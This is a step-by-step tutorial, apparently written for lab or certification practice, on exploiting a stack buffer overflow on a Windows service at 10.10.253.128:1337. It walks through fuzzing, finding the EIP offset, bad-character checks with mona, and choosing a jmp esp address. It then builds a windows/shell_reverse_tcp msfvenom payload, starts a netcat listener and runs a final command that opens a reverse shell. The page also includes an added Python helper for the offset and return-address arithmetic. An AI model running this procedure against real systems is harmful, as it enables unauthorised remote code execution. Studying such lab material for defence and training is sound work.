Step 0 - Download Script
I made a simple python script to make exploiting buffer overflows simpler. Download the script here.
Step 1 - Fuzzing
This command gives a general idea of the input length at which the program crashes.
python buff.py --fuzz -d 10.10.253.128 -p 1337
Step 2 - Finding the Offset by Creating Pattern
After running the python script in Step 1, you should know the approximate length at which the program crashes. Run the command below with -l set to that length plus an additional 400 characters.
python buff.py --offset -d 10.10.253.128 -p 1337 -l 1100
Step 3 - Finding the Offset by Querying Pattern
Read the EIP value from the debugger at the point where the program crashed. The command below will tell you the exact offset at which EIP was overwritten.
python buff.py --query -q 76413176
Step 4 - Finding Bad Characters by Sending Bytearray
The command below sends a bytearray to the program; we can then use mona.py to determine which characters are bad characters.
python buff.py --chars -d 10.10.253.128 -p 1337 -o 634
After sending the payload, check that the EIP register is equal to 42424242 (all B's). Otherwise your offset value is incorrect.
Step 5 - Finding Bad Characters by Querying Bytearray
Within Immunity Debugger, set the working directory of mona:
!mona config -set workingfolder c:\mona\%p
Generate a bytearray:
!mona bytearray -b "\x00"
Check for bad characters:
!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>
Step 6 - Finding Jump Point
With the list of bad characters identified, use the mona command below, adding the bad characters to the -cpb option.
!mona jmp -r esp -cpb "\x00........."
Example
!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"
Note: Sometimes a bad character also corrupts the byte that follows it, or even the rest of the string, so those following bytes show up in the comparison without actually being bad. If the command above returns zero results, try removing the bytes that may only have been corrupted by the one before them.
Original:
\x00\x07\x08\x2e\x2f\xa0\xa1
Modified:
\x00\x07\x2e\xa0
The result displays all the `jmp esp` instructions with addresses that don't contain any of the bad characters.
Choose one of the addresses from the result of jmp esp. Note: You will need to write the address byte-reversed, since x86 is little-endian and the four bytes are stored in memory lowest byte first.
Address:
0x625011af
-->625011af
retn:
af115062
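To show how the --query step in Step 3 arrives at offset 634 from the EIP value 76413176, and how the retn value af115062 in Step 6 is derived from 0x625011af, here is an added example. It is not buff.py or any code from the original page; it assumes the script uses a Metasploit-style cyclic pattern (upper, lower, digit triples), which is what reproduces the page's 634, and it also checks a candidate address against the bad-character list the way `!mona jmp -cpb` does.

```python
import string
import struct

# Values taken from the page's own steps (EIP at crash, -l length, chosen address).
EIP_VALUE = "76413176"        # EIP as shown in the debugger after the crash
PATTERN_LENGTH = 1100         # -l 1100 from Step 2
JMP_ESP_ADDRESS = 0x625011af  # address chosen in Step 6
BAD_CHARS = b"\x00\x07\x08\x2e\x2f\xa0\xa1"  # list from the Step 6 example


def cyclic_pattern(length):
    """Metasploit-style pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit)."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_offset(eip_hex, length):
    """Return the offset of the 4 pattern bytes that landed in EIP, or None."""
    # The debugger prints EIP as a number (0x76413176), but the bytes sit in
    # memory little-endian, so reverse them to recover the chunk "v1Av".
    chunk = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    idx = cyclic_pattern(length).find(chunk)
    return None if idx == -1 else idx


def retn_bytes(address):
    """Pack the jmp esp address little-endian: 0x625011af -> af115062."""
    return struct.pack("<I", address)


def contains_bad_char(address, bad_chars):
    """True if any byte of the packed address is in the bad-character list."""
    return any(b in bad_chars for b in retn_bytes(address))


if __name__ == "__main__":
    print("offset:", pattern_offset(EIP_VALUE, PATTERN_LENGTH))
    print("retn:  ", retn_bytes(JMP_ESP_ADDRESS).hex())
    print("usable:", not contains_bad_char(JMP_ESP_ADDRESS, BAD_CHARS))
```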
Step 7 - Exploiting
Run the following msfvenom command and update the `-b` option with all the bad characters identified earlier.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
Change the payload variable in the payload function of buff.py to the output of the command.
Lastly, start a netcat listener on the port specified as LPORT in the msfvenom command, then run the command below to get a reverse shell.
python buff.py --exploit -d 10.10.253.128 -p 1337 -o 634 -r 'af115062'